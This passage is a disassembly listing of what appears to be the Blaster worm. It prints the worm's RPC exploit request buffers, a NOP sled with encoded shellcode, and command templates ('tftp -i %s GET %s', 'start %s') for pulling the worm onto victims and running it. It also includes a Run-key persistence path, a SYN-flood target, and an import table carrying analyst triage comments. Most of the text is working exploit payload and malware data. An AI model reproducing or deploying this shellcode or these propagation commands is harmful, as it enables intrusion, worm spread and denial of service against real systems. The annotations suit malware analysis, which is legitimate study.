0, 0, 0, 0; 224 .data:00404108 db 0, 0, 0, 0,0C4h, 28h,0CDh, 0, 64h, 29h,0CDh, 0, 0, 0, 0, 0; 240 .data:00404108 db 7, 0, 0, 0,0B9h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 256 .data:00404108 db 0, 0, 0, 46h,0ABh, 1, 0, 0, 0, 0, 0, 
0,0C0h, 0, 0, 0; 272 .data:00404108 db 0, 0, 0, 46h,0A5h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 288 .data:00404108 db 0, 0, 0, 46h,0A6h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 304 .data:00404108 db 0, 0, 0, 46h,0A4h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 320 .data:00404108 db 0, 0, 0, 46h,0ADh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 336 .data:00404108 db 0, 0, 0, 46h,0AAh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 352 .data:00404108 db 0, 0, 0, 46h, 7, 0, 0, 0, 60h, 0, 0, 0, 58h, 0, 0, 0; 368 .data:00404108 db 90h, 0, 0, 0, 40h, 0, 0, 0, 20h, 0, 0, 0, 78h, 0, 0, 0; 384 .data:00404108 db 30h, 0, 0, 0, 1, 0, 0, 0, 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh; 400 .data:00404108 db 50h, 0, 0, 0, 4Fh,0B6h, 88h, 20h,0FFh,0FFh,0FFh,0FFh, 0, 0, 0, 0; 416 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 432 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 448 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 464 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 480 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh; 496 .data:00404108 db 48h, 0, 0, 0, 7, 0, 66h, 0, 6, 9, 2, 0, 0, 0, 0, 0; 512 .data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 10h, 0, 0, 0, 0, 0, 0, 0; 528 .data:00404108 db 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 78h, 19h, 0Ch, 0; 544 .data:00404108 db 58h, 0, 0, 0, 5, 0, 6, 0, 1, 0, 0, 0, 70h,0D8h, 98h, 93h; 560 .data:00404108 db 98h, 4Fh,0D2h, 11h,0A9h, 3Dh,0BEh, 57h,0B2h, 0, 0, 0, 32h, 0, 31h, 0; 576 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 80h, 0, 0, 0, 0Dh,0F0h,0ADh,0BAh; 592 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 608 .data:00404108 db 18h, 43h, 14h, 0, 0, 0, 0, 0, 60h, 0, 0, 0, 60h, 0, 0, 0; 624 .data:00404108 db 4Dh, 45h, 4Fh, 57h, 4, 0, 0, 0,0C0h, 1, 0, 0, 0, 0, 0, 0; 640 .data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 3Bh, 3, 0, 0, 0, 0, 0, 0; 656 .data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 0, 0, 0, 0, 30h, 0, 0, 0; 672 .data:00404108 db 1, 0, 1, 0, 81h,0C5h, 
17h, 3, 80h, 0Eh,0E9h, 4Ah, 99h, 99h,0F1h, 8Ah; 688 .data:00404108 db 50h, 6Fh, 7Ah, 85h, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 704 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0; 720 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 30h, 0, 0, 0, 78h, 0, 6Eh, 0; 736 .data:00404108 db 0, 0, 0, 0,0D8h,0DAh, 0Dh, 0, 0, 0, 0, 0, 0, 0, 0, 0; 752 .data:00404108 db 20h, 2Fh, 0Ch, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0; 768 .data:00404108 db 0, 0, 0, 0, 3, 0, 0, 0, 46h, 0, 58h, 0, 0, 0, 0, 0; 784 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 10h, 0, 0, 0, 30h, 0, 2Eh, 0; 800 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 816 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 68h, 0, 0, 0, 0Eh, 0,0FFh,0FFh; 832 .data:00404108 db 68h, 8Bh, 0Bh, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 848 .data:00404468 request2 db 20h, 0, 0, 0, 0, 0, 0, 0, 20h, 0, 0, 0, 5Ch, 0, 5Ch, 0; 0 .data:00404478 request3: .data:00404478 unicode 0, <\C$\123456111111111111111.doc>,0 .data:004044B4 sc: .data:004044B4 unicode 0, .data:004044D8 dd 0FFFFFFFFh .data:004044DC dd 7FFDE0CCh .data:004044E0 dd 7FFDE0CCh .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 0 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 16 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 32 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 48 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 64 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 80 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 96 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 112 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 
90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 128 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 144 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h,0EBh, 19h, 5Eh, 31h,0C9h, 81h,0E9h, 89h,0FFh; 160 .data:004044E4 db 0FFh,0FFh, 81h, 36h, 80h,0BFh, 32h, 94h, 81h,0EEh,0FCh,0FFh,0FFh,0FFh,0E2h,0F2h; 176 .data:004044E4 db 0EBh, 5,0E8h,0E2h,0FFh,0FFh,0FFh, 3, 53h, 6, 1Fh, 74h, 57h, 75h, 95h, 80h; 192 .data:004044E4 db 0BFh,0BBh, 92h, 7Fh, 89h, 5Ah, 1Ah,0CEh,0B1h,0DEh, 7Ch,0E1h,0BEh, 32h, 94h, 9; 208 .data:004044E4 db 0F9h, 3Ah, 6Bh,0B6h,0D7h, 9Fh, 4Dh, 85h, 71h,0DAh,0C6h, 81h,0BFh, 32h, 1Dh,0C6h; 224 .data:004044E4 db 0B3h, 5Ah,0F8h,0ECh,0BFh, 32h,0FCh,0B3h, 8Dh, 1Ch,0F0h,0E8h,0C8h, 41h,0A6h,0DFh; 240 .data:004044E4 db 0EBh,0CDh,0C2h, 88h, 36h, 74h, 90h, 7Fh, 89h, 5Ah,0E6h, 7Eh, 0Ch, 24h, 7Ch,0ADh; 256 .data:004044E4 db 0BEh, 32h, 94h, 9,0F9h, 22h, 6Bh,0B6h,0D7h, 4Ch, 4Ch, 62h,0CCh,0DAh, 8Ah, 81h; 272 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0ABh,0CDh,0E2h, 84h,0D7h,0F9h, 79h, 7Ch, 84h,0DAh, 9Ah, 81h; 288 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0A7h,0CDh,0E2h, 84h,0D7h,0EBh, 9Dh, 75h, 12h,0DAh, 6Ah, 80h; 304 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0A3h,0CDh,0E2h, 84h,0D7h, 96h, 8Eh,0F0h, 78h,0DAh, 7Ah, 80h; 320 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 9Fh,0CDh,0E2h, 84h,0D7h, 96h, 39h,0AEh, 56h,0DAh, 4Ah, 80h; 336 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 9Bh,0CDh,0E2h, 84h,0D7h,0D7h,0DDh, 6,0F6h,0DAh, 5Ah, 80h; 352 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 97h,0CDh,0E2h, 84h,0D7h,0D5h,0EDh, 46h,0C6h,0DAh, 2Ah, 80h; 368 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 93h, 1, 6Bh, 1, 53h,0A2h, 95h, 80h,0BFh, 66h,0FCh, 81h; 384 .data:004044E4 db 0BEh, 32h, 94h, 7Fh,0E9h, 2Ah,0C4h,0D0h,0EFh, 62h,0D4h,0D0h,0FFh, 62h, 6Bh,0D6h; 400 .data:004044E4 db 0A3h,0B9h, 4Ch,0D7h,0E8h, 5Ah, 96h, 80h,0AEh, 6Eh, 1Fh, 4Ch,0D5h, 24h,0C5h,0D3h; 416 .data:004044E4 db 40h, 64h,0B4h,0D7h,0ECh,0CDh,0C2h,0A4h,0E8h, 63h,0C7h, 7Fh,0E9h, 1Ah, 1Fh, 50h; 432 .data:004044E4 db 
0D7h, 57h,0ECh,0E5h,0BFh, 5Ah,0F7h,0EDh,0DBh, 1Ch, 1Dh,0E6h, 8Fh,0B1h, 78h,0D4h; 448 .data:004044E4 db 32h, 0Eh,0B0h,0B3h, 7Fh, 1, 5Dh, 3, 7Eh, 27h, 3Fh, 62h, 42h,0F4h,0D0h,0A4h; 464 .data:004044E4 db 0AFh, 76h, 6Ah,0C4h, 9Bh, 0Fh, 1Dh,0D4h, 9Bh, 7Ah, 1Dh,0D4h, 9Bh, 7Eh, 1Dh,0D4h; 480 .data:004044E4 db 9Bh, 62h, 19h,0C4h, 9Bh, 22h,0C0h,0D0h,0EEh, 63h,0C5h,0EAh,0BEh, 63h,0C5h, 7Fh; 496 .data:004044E4 db 0C9h, 2,0C5h, 7Fh,0E9h, 22h, 1Fh, 4Ch,0D5h,0CDh, 6Bh,0B1h, 40h, 64h, 98h, 0Bh; 512 .data:004044E4 db 77h, 65h, 6Bh,0D6h, 93h,0CDh,0C2h, 94h,0EAh, 64h,0F0h, 21h, 8Fh, 32h, 94h, 80h; 528 .data:004044E4 db 3Ah,0F2h,0ECh, 8Ch, 34h, 72h, 98h, 0Bh,0CFh, 2Eh, 39h, 0Bh,0D7h, 3Ah, 7Fh, 89h; 544 .data:004044E4 db 34h, 72h,0A0h, 0Bh, 17h, 8Ah, 94h, 80h,0BFh,0B9h, 51h,0DEh,0E2h,0F0h, 90h, 80h; 560 .data:004044E4 db 0ECh, 67h,0C2h,0D7h, 34h, 5Eh,0B0h, 98h, 34h, 77h,0A8h, 0Bh,0EBh, 37h,0ECh, 83h; 576 .data:004044E4 db 6Ah,0B9h,0DEh, 98h, 34h, 68h,0B4h, 83h, 62h,0D1h,0A6h,0C9h, 34h, 6, 1Fh, 83h; 592 .data:004044E4 db 4Ah, 1, 6Bh, 7Ch, 8Ch,0F2h, 38h,0BAh, 7Bh, 46h, 93h, 41h, 70h, 3Fh, 97h, 78h; 608 .data:004044E4 db 54h,0C0h,0AFh,0FCh, 9Bh, 26h,0E1h, 61h, 34h, 68h,0B0h, 83h, 62h, 54h, 1Fh, 8Ch; 624 .data:004044E4 db 0F4h,0B9h,0CEh, 9Ch,0BCh,0EFh, 1Fh, 84h, 34h, 31h, 51h, 6Bh,0BDh, 1, 54h, 0Bh; 640 .data:004044E4 db 6Ah, 6Dh,0CAh,0DDh,0E4h,0F0h, 90h, 80h, 2Fh,0A2h, 4, 0; 656 .data:00404780 request4 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 20h, 0, 0, 0, 30h, 0, 2Dh, 0; 0 .data:00404780 db 0, 0, 0, 0, 88h, 2Ah, 0Ch, 0, 2, 0, 0, 0, 1, 0, 0, 0; 16 .data:00404780 db 28h, 8Ch, 0Ch, 0, 1, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0; 32 .data:004047B0 g_zerobuf60 db 3Ch dup(0) .data:004047EC aWindowsupdate_ db 'windowsupdate.com',0 ; DATA XREF: WUSYNFloodThread+E^o .data:004047FE aS_0 db '%s',0Ah,0 ; DATA XREF: infectTarget+47F^o .data:00404802 aStartS db 'start %s',0Ah,0 ; DATA XREF: infectTarget+432^o .data:0040480C aTftpISGetS db 'tftp -i %s GET %s',0Ah,0 ; DATA XREF: infectTarget+3C4^o .data:0040481F 
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: infectTarget+36E^o .data:0040482B aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: infect20Hosts+8C^o .data:0040482B ; sendTCP80SYN+66^o .data:00404837 aRb db 'rb',0 ; DATA XREF: TFTPServerThread+BA^o .data:0040483A aM db 'M',0 ; DATA XREF: WinMain+2CB^o .data:0040483C aD db 'd',0 ; DATA XREF: WinMain+2B2^o .data:0040483E a_ db '.',0 ; DATA XREF: WinMain+18C^o .data:0040483E ; WinMain+1AE^o ... .data:00404840 aS db '%s',0 ; DATA XREF: WinMain+17B^o .data:00404843 aBilly db 'BILLY',0 ; DATA XREF: WinMain+4F^o .data:00404849 aWindowsAutoUpd db 'windows auto update',0 ; DATA XREF: WinMain+3A^o .data:0040485D aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 .data:0040485D ; DATA XREF: WinMain+20^o .data:0040488B align 4 .data:0040488B _data ends .data:0040488B .idata:004051C8 ; .idata:004051C8 ; Imports from WS2_32.DLL .idata:004051C8 ; .idata:004051C8 ; Section 4. (virtual address 00005000) .idata:004051C8 ; Virtual size : 000006C0 ( 1728.) .idata:004051C8 ; Section size in file : 000006C0 ( 1728.) .idata:004051C8 ; Offset to raw data for section: 00002400 .idata:004051C8 ; Flags C0000060: Text Data Readable Writable .idata:004051C8 ; Alignment : 16 bytes ? 
.idata:004051C8 ; --------------------------------------------------------------------------- .idata:004051C8 .idata:004051C8 ; Segment type: Externs .idata:004051C8 ; _idata .idata:004051C8 ; u_short __stdcall __imp_htons(u_short hostshort) .idata:004051C8 extrn __imp_htons:dword ; DATA XREF: htons^r .idata:004051CC ; int __stdcall __imp_ioctlsocket(SOCKET s,__int32 cmd,u_long *argp) .idata:004051CC extrn __imp_ioctlsocket:dword ; DATA XREF: ioctlsocket^r .idata:004051D0 ; unsigned __int32 __stdcall __imp_inet_addr(const char *cp) .idata:004051D0 extrn __imp_inet_addr:dword ; DATA XREF: inet_addr^r .idata:004051D4 ; char *__stdcall __imp_inet_ntoa(struct in_addr in) .idata:004051D4 extrn __imp_inet_ntoa:dword ; DATA XREF: inet_ntoa^r .idata:004051D8 ; int __stdcall __imp_recvfrom(SOCKET s,char *buf,int len,int flags,struct sockaddr *from,int *fromlen) .idata:004051D8 extrn __imp_recvfrom:dword ; DATA XREF: recvfrom^r .idata:004051DC ; int __stdcall __imp_select(int nfds,fd_set *readfds,fd_set *writefds,fd_set *exceptfds,const struct timeval *timeout) .idata:004051DC extrn __imp_select:dword ; DATA XREF: select^r .idata:004051E0 ; int __stdcall __imp_send(SOCKET s,const char *buf,int len,int flags) .idata:004051E0 extrn __imp_send:dword ; DATA XREF: send^r .idata:004051E4 ; int __stdcall __imp_sendto(SOCKET s,const char *buf,int len,int flags,const struct sockaddr *to,int tolen) .idata:004051E4 extrn __imp_sendto:dword ; DATA XREF: sendto^r .idata:004051E8 ; int __stdcall __imp_setsockopt(SOCKET s,int level,int optname,const char *optval,int optlen) .idata:004051E8 extrn __imp_setsockopt:dword ; DATA XREF: setsockopt^r .idata:004051EC ; SOCKET __stdcall __imp_socket(int af,int type,int protocol) .idata:004051EC extrn __imp_socket:dword ; DATA XREF: socket^r .idata:004051F0 ; struct hostent *__stdcall __imp_gethostbyname(const char *name) .idata:004051F0 extrn __imp_gethostbyname:dword ; DATA XREF: gethostbyname^r .idata:004051F4 ; int __stdcall __imp_bind(SOCKET 
s,const struct sockaddr *name,int namelen) .idata:004051F4 extrn __imp_bind:dword ; DATA XREF: bind^r .idata:004051F8 ; int __stdcall __imp_gethostname(char *name,int namelen) .idata:004051F8 extrn __imp_gethostname:dword ; DATA XREF: gethostname^r .idata:004051FC ; int __stdcall __imp_closesocket(SOCKET s) .idata:004051FC extrn __imp_closesocket:dword ; DATA XREF: closesocket^r .idata:00405200 ; int __stdcall __imp_WSAStartup(WORD wVersionRequested,LPWSADATA lpWSAData) .idata:00405200 extrn __imp_WSAStartup:dword ; DATA XREF: WSAStartup^r .idata:00405204 ; int _imp_WSACleanup(void) .idata:00405204 extrn __imp_WSACleanup:dword ; DATA XREF: WSACleanup^r .idata:00405208 ; int __stdcall __imp_connect(SOCKET s,const struct sockaddr *name,int namelen) .idata:00405208 extrn __imp_connect:dword ; DATA XREF: connect^r .idata:0040520C ; int __stdcall __imp_getpeername(SOCKET s,struct sockaddr *name,int *namelen) .idata:0040520C extrn __imp_getpeername:dword ; DATA XREF: getpeername^r .idata:00405210 ; int __stdcall __imp_getsockname(SOCKET s,struct sockaddr *name,int *namelen) .idata:00405210 extrn __imp_getsockname:dword ; DATA XREF: getsockname^r .idata:00405214 ; SOCKET __stdcall __imp_WSASocketA(int af,int type,int protocol,LPWSAPROTOCOL_INFOA lpProtocolInfo,GROUP g,DWORD dwFlags) .idata:00405214 extrn __imp_WSASocketA:dword ; DATA XREF: WSASocketA^r .idata:00405218 .idata:0040521C .idata:00405220 ; .idata:00405220 ; Imports from WININET.DLL .idata:00405220 ; .idata:00405220 extrn __imp_InternetGetConnectedState:dword .idata:00405220 ; DATA XREF: InternetGetConnectedState^r .idata:00405224 .idata:00405228 .idata:0040522C ; .idata:0040522C ; Imports from KERNEL32.DLL .idata:0040522C ; .idata:0040522C ; void __stdcall __imp_ExitProcess(UINT uExitCode) .idata:0040522C extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess^r .idata:00405230 ; void __stdcall __imp_ExitThread(DWORD dwExitCode) .idata:00405230 extrn __imp_ExitThread:dword ; DATA XREF: ExitThread^r 
.idata:00405234 ; ------------------------------------------------------------------------
.idata:00405234 ; Import Address Table, continued: the rest of the KERNEL32.DLL imports,
.idata:00405234 ; then ADVAPI32.DLL and CRTDLL.DLL. Each "extrn __imp_X:dword" is the IAT
.idata:00405234 ; slot the loader fills with the address of X; the "DATA XREF: X^r" note
.idata:00405234 ; is IDA's record of the location (presumably the import thunk named X)
.idata:00405234 ; that reads the slot. Entries without a prototype comment were left
.idata:00405234 ; untyped by the disassembler; their documented prototypes are added below.
.idata:00405234 ; For static triage the import set is the evidence this section gives:
.idata:00405234 ; registry write (RegCreateKeyExA/RegSetValueExA), a mutex (CreateMutexA),
.idata:00405234 ; thread creation/termination, file reading (fopen/fread), own-module path
.idata:00405234 ; lookup (GetModuleFileNameA) and, above, Winsock/WinInet networking. How
.idata:00405234 ; each is used is established only at the call sites in .text, not here.
.idata:00405234 ; ------------------------------------------------------------------------
.idata:00405234 ; LPSTR _imp_GetCommandLineA(void)
.idata:00405234 extrn __imp_GetCommandLineA:dword
.idata:00405234 ; DATA XREF: GetCommandLineA^r
.idata:00405238 ; int __stdcall __imp_GetDateFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpDate,LPCSTR lpFormat,LPSTR lpDateStr,int cchDate)
.idata:00405238 extrn __imp_GetDateFormatA:dword
.idata:00405238 ; DATA XREF: GetDateFormatA^r
.idata:0040523C ; DWORD _imp_GetLastError(void)
.idata:0040523C extrn __imp_GetLastError:dword ; DATA XREF: GetLastError^r
.idata:00405240 ; DWORD __stdcall __imp_GetModuleFileNameA(HMODULE hModule,LPSTR lpFilename,DWORD nSize)
.idata:00405240 extrn __imp_GetModuleFileNameA:dword
.idata:00405240 ; DATA XREF: GetModuleFileNameA^r
.idata:00405244 ; HMODULE __stdcall __imp_GetModuleHandleA(LPCSTR lpModuleName)
.idata:00405244 extrn __imp_GetModuleHandleA:dword
.idata:00405244 ; DATA XREF: GetModuleHandleA^r
.idata:00405248 ; BOOL __stdcall __imp_CloseHandle(HANDLE hObject)
.idata:00405248 extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandle^r
.idata:0040524C ; DWORD _imp_GetTickCount(void)
.idata:0040524C extrn __imp_GetTickCount:dword ; DATA XREF: GetTickCount^r
.idata:00405250 ; void __stdcall __imp_RtlUnwind(PVOID TargetFrame,PVOID TargetIp,PEXCEPTION_RECORD ExceptionRecord,PVOID ReturnValue)
.idata:00405250 ; (SEH unwind primitive; prototype was not typed by IDA)
.idata:00405250 extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind^r
.idata:00405254 ; HANDLE __stdcall __imp_CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes,BOOL bInitialOwner,LPCSTR lpName)
.idata:00405254 ; NOTE(review): a named mutex is a common single-instance marker; the
.idata:00405254 ;  lpName string passed at the call site (data section, not shown here)
.idata:00405254 ;  is a candidate indicator worth recording.
.idata:00405254 extrn __imp_CreateMutexA:dword ; DATA XREF: CreateMutexA^r
.idata:00405258 ; void __stdcall __imp_Sleep(DWORD dwMilliseconds)
.idata:00405258 extrn __imp_Sleep:dword ; DATA XREF: Sleep^r
.idata:0040525C ; BOOL __stdcall __imp_TerminateThread(HANDLE hThread,DWORD dwExitCode)
.idata:0040525C ; (kills the target thread without unwinding it or releasing its locks;
.idata:0040525C ;  which thread is targeted is visible only at the call site)
.idata:0040525C extrn __imp_TerminateThread:dword
.idata:0040525C ; DATA XREF: TerminateThread^r
.idata:00405260 ; HANDLE __stdcall __imp_CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,DWORD dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
.idata:00405260 extrn __imp_CreateThread:dword ; DATA XREF: CreateThread^r
.idata:00405264
.idata:00405268
.idata:0040526C ;
.idata:0040526C ; Imports from ADVAPI32.DLL
.idata:0040526C ;
.idata:0040526C ; Only registry-write primitives are imported from ADVAPI32 (no query or
.idata:0040526C ; delete); the key path and value are strings in the data section and are
.idata:0040526C ; the natural persistence indicator to look for at the call sites.
.idata:0040526C ; LONG __stdcall __imp_RegCloseKey(HKEY hKey)
.idata:0040526C extrn __imp_RegCloseKey:dword ; DATA XREF: RegCloseKey^r
.idata:00405270 ; LONG __stdcall __imp_RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition)
.idata:00405270 extrn __imp_RegCreateKeyExA:dword
.idata:00405270 ; DATA XREF: RegCreateKeyExA^r
.idata:00405274 ; LONG __stdcall __imp_RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,const BYTE *lpData,DWORD cbData)
.idata:00405274 extrn __imp_RegSetValueExA:dword
.idata:00405274 ; DATA XREF: RegSetValueExA^r
.idata:00405278
.idata:0040527C
.idata:00405280 ;
.idata:00405280 ; Imports from CRTDLL.DLL
.idata:00405280 ;
.idata:00405280 ; void __cdecl __GetMainArgs(int *argc,char ***argv,char ***envp,int glob)
.idata:00405280 ; (CRTDLL argv/envp setup helper as declared by the MinGW CRT; untyped by
.idata:00405280 ;  IDA. Its presence, with CRTDLL rather than MSVCRT, is consistent with a
.idata:00405280 ;  MinGW-style toolchain -- an inference, not established by this listing.)
.idata:00405280 extrn __imp___GetMainArgs:dword ; DATA XREF: __GetMainArgs^r
.idata:00405284 ; int __cdecl _imp_atoi(const char *)
.idata:00405284 extrn __imp_atoi:dword ; DATA XREF: atoi^r
.idata:00405288 ; void __cdecl _imp_exit(int)
.idata:00405288 extrn __imp_exit:dword ; DATA XREF: exit^r
.idata:0040528C ; int __cdecl _imp_fclose(FILE *)
.idata:0040528C extrn __imp_fclose:dword ; DATA XREF: fclose^r
.idata:00405290 ; FILE *__cdecl _imp_fopen(const char *,const char *)
.idata:00405290 extrn __imp_fopen:dword ; DATA XREF: fopen^r
.idata:00405294 ; size_t __cdecl _imp_fread(void *,size_t,size_t,FILE *)
.idata:00405294 extrn __imp_fread:dword ; DATA XREF: fread^r
.idata:00405298 ; void *__cdecl _imp_memcpy(void *,const void *,size_t)
.idata:00405298 extrn __imp_memcpy:dword ; DATA XREF: memcpy^r
.idata:0040529C ; void *__cdecl _imp_memset(void *,int,size_t)
.idata:0040529C extrn __imp_memset:dword ; DATA XREF: memset^r
.idata:004052A0 ; int __cdecl _imp_raise(int)
.idata:004052A0 extrn __imp_raise:dword ; DATA XREF: raise^r
.idata:004052A4 ; int _imp_rand(void)
.idata:004052A4 extrn __imp_rand:dword ; DATA XREF: rand^r
.idata:004052A8 ; void (__cdecl *_imp_signal(int,void (__cdecl *)(int)))(int)
.idata:004052A8 extrn __imp_signal:dword ; DATA XREF: signal^r
.idata:004052AC ; int __cdecl _imp_sprintf(char *,const char *,...)
.idata:004052AC ; (no destination length parameter: any fixed-size buffer it writes can
.idata:004052AC ;  only be bounds-checked by reading the format and arguments at the call
.idata:004052AC ;  site)
.idata:004052AC extrn __imp_sprintf:dword ; DATA XREF: sprintf^r
.idata:004052B0 ; void __cdecl _imp_srand(unsigned int)
.idata:004052B0 extrn __imp_srand:dword ; DATA XREF: srand^r
.idata:004052B4 ; char *__cdecl _imp_strchr(const char *,int)
.idata:004052B4 extrn __imp_strchr:dword ; DATA XREF: strchr^r
.idata:004052B8 ; char *__cdecl _imp_strtok(char *,const char *)
.idata:004052B8 ; (writes NULs into its input in place and keeps its cursor in static CRT
.idata:004052B8 ;  storage, so it is not safe to interleave across threads)
.idata:004052B8 extrn __imp_strtok:dword ; DATA XREF: strtok^r
.idata:004052BC
.idata:004052BC
.idata:004052BC
.idata:004052BC ; End of module; "start" names the PE entry-point label.
.idata:004052BC end start
